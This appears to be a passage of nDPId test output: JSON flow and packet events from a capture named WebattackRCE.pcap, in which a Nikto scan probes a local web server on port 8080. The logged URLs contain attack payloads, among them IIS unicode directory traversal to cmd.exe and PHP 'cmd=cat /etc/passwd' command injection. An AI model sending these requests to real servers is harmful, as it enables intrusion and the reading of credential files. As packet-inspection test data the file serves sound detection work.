-00726{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":731,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":731,"flow_packet_id":1,"flow_last_seen":1576420277873,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":252,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":252,"pkt_l4_len":218,"thread_ts_msec":1576420277873,"pkt":"AAAAAAAAAAAAAAAACABFAADuNNpAAEAGBy5\/AAABfwAAAcdQH5AuMg3l88MKY4AYAED+4gAAAQEICp1m\/5mdZv+ZR0VUIC9tc2FkYy8uLiVjMCVhZi4uLy4uJWMwJWFmLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzE5MykNCg0K"} -01109{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":731,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277873,"flow_last_seen":1576420277873,"flow_idle_time":7440000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":186,"midstream":1,"thread_ts_msec":1576420277873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51024,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003193)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":732,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277874,"flow_last_seen":1576420277874,"flow_idle_time":7440000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":189,"midstream":1,"thread_ts_msec":1576420277874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51026,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00730{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":732,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":732,"flow_packet_id":1,"flow_last_seen":1576420277874,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":255,"pkt_l4_len":221,"thread_ts_msec":1576420277874,"pkt":"AAAAAAAAAAAAAAAACABFAADxWrBAAEAG4VR\/AAABfwAAAcdSH5DZZWOTGgkmxYAYAED+5QAAAQEICp1m\/5qdZv+aR0VUIC9wYnNlcnZlci8uLiVjMCVhZi4uLy4uJWMwJWFmLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01112{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":732,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277874,"flow_last_seen":1576420277874,"flow_idle_time":7440000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":189,"midstream":1,"thread_ts_msec":1576420277874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51026,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pbserver\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003194)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":733,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277875,"flow_last_seen":1576420277875,"flow_idle_time":7440000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420277875,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51028,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00727{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":733,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":733,"flow_packet_id":1,"flow_last_seen":1576420277875,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":1576420277875,"pkt":"AAAAAAAAAAAAAAAACABFAADs1jZAAEAGZdN\/AAABfwAAAcdUH5CUA+8Kq3ejjIAYAED+4AAAAQEICp1m\/5udZv+bR0VUIC9ycGMvLi4lYzAlYWYuLi8uLiVjMCVhZi4uL3dpbm50L3N5c3RlbTMyL2NtZC5leGU\/L2MrZGlyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTUpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
-01107{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":733,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277875,"flow_last_seen":1576420277875,"flow_idle_time":7440000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420277875,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51028,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/rpc\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003195)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":734,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277877,"flow_last_seen":1576420277877,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51030,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":734,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":734,"flow_packet_id":1,"flow_last_seen":1576420277877,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1576420277877,"pkt":"AAAAAAAAAAAAAAAACABFAADl6fRAAEAGUhx\/AAABfwAAAcdWH5B7VdDQBDmQE4AYAED+2QAAAQEICp1m\/52dZv+dR0VUIC9zY3JpcHRzLy4uJWMwJWFmLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTYpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01099{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":734,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277877,"flow_last_seen":1576420277877,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51030,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003196)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":735,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277878,"flow_last_seen":1576420277878,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277878,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51032,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":735,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":735,"flow_packet_id":1,"flow_last_seen":1576420277878,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1576420277878,"pkt":"AAAAAAAAAAAAAAAACABFAADltn1AAEAGhZN\/AAABfwAAAcdYH5Dqro9H\/GjzZIAYAED+2QAAAQEICp1m\/56dZv+eR0VUIC9zY3JpcHRzLy4uJWMxJTFjLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01099{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":735,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277878,"flow_last_seen":1576420277878,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277878,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51032,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%c1%1c..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003197)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":736,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277880,"flow_last_seen":1576420277880,"flow_idle_time":7440000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420277880,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51034,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00722{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":736,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":736,"flow_packet_id":1,"flow_last_seen":1576420277880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1576420277880,"pkt":"AAAAAAAAAAAAAAAACABFAADqdQ5AAEAGxv1\/AAABfwAAAcdaH5DlNEwz0kNZnYAYAED+3gAAAQEICp1m\/6CdZv+gR0VUIC9zY3JpcHRzLy4uJWMxJTFjLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIrYzpcIiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzE5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01106{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":736,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277880,"flow_last_seen":1576420277880,"flow_idle_time":7440000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420277880,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51034,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%c1%1c..\/winnt\/system32\/cmd.exe?\/c+dir+c:\\\"","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003198)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":737,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277882,"flow_last_seen":1576420277882,"flow_idle_time":7440000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277882,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51036,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00746{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":737,"flow_packet_id":1,"flow_last_seen":1576420277882,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":266,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":266,"pkt_l4_len":232,"thread_ts_msec":1576420277882,"pkt":"AAAAAAAAAAAAAAAACABFAAD8MthAAEAGCSJ\/AAABfwAAAcdcH5B7UwvpG4XAvoAYAED+8AAAAQEICp1m\/6GdZv+hR0VUIC9fdnRpX2Jpbi8uLiVjMCVhZi4uLy4uJWMwJWFmLi4vLi4lYzAlYWYuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzE5OSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01124{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":737,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277882,"flow_last_seen":1576420277882,"flow_idle_time":7440000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277882,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51036,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/_vti_bin\/..%c0%af..\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003199)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":738,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277883,"flow_last_seen":1576420277883,"flow_idle_time":7440000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277883,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51038,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":738,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":738,"flow_packet_id":1,"flow_last_seen":1576420277883,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":1576420277883,"pkt":"AAAAAAAAAAAAAAAACABFAADcUThAAEAG6uF\/AAABfwAAAcdeH5DOhWgJaQI1xYAYAED+0AAAAQEICp1m\/6OdZv+jR0VUIC9hZG1pbi9zeXN0ZW0ucGhwMz9jbWQ9Y2F0JTIwL2V0Yy9wYXNzd2QgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMyMTYpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01088{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":738,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277883,"flow_last_seen":1576420277883,"flow_idle_time":7440000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277883,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51038,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/system.php3?cmd=cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003216)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":739,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277885,"flow_last_seen":1576420277885,"flow_idle_time":7440000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51040,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":739,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":739,"flow_packet_id":1,"flow_last_seen":1576420277885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":227,"pkt_l4_len":193,"thread_ts_msec":1576420277885,"pkt":"AAAAAAAAAAAAAAAACABFAADVkAVAAEAGrBt\/AAABfwAAAcdgH5ANV6k94mK\/lYAYAED+yQAAAQEICp1m\/6WdZv+lR0VUIC9hZG1pbi9zeXN0ZW0ucGhwMz9jbWQ9ZGlyJTIwYzpcXCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzIxNykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01081{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":739,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277885,"flow_last_seen":1576420277885,"flow_idle_time":7440000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51040,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/system.php3?cmd=dir%20c:\\\\","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003217)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":740,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277887,"flow_last_seen":1576420277887,"flow_idle_time":7440000,"flow_min_l4_payload_len":166,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":166,"midstream":1,"thread_ts_msec":1576420277887,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51042,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":740,"flow_packet_id":1,"flow_last_seen":1576420277887,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":232,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":232,"pkt_l4_len":198,"thread_ts_msec":1576420277887,"pkt":"AAAAAAAAAAAAAAAACABFAADawa5AAEAGem1\/AAABfwAAAcdiH5DPxPiU5alglIAYAED+zgAAAQEICp1m\/6edZv+nR0VUIC9hZG1pbi9leGVjLnBocDM\/Y21kPWNhdCUyMC9ldGMvcGFzc3dkIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMjE4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01086{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":740,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277887,"flow_last_seen":1576420277887,"flow_idle_time":7440000,"flow_min_l4_payload_len":166,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":166,"midstream":1,"thread_ts_msec":1576420277887,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51042,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/exec.php3?cmd=cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003218)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":741,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277889,"flow_last_seen":1576420277889,"flow_idle_time":7440000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420277889,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51044,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00691{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":741,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":741,"flow_packet_id":1,"flow_last_seen":1576420277889,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1576420277889,"pkt":"AAAAAAAAAAAAAAAACABFAADTtGFAAEAGh8F\/AAABfwAAAcdkH5BoGo0gUvgPHYAYAED+xwAAAQEICp1m\/6mdZv+pR0VUIC9hZG1pbi9leGVjLnBocDM\/Y21kPWRpciUyMGM6XFwgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMyMTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 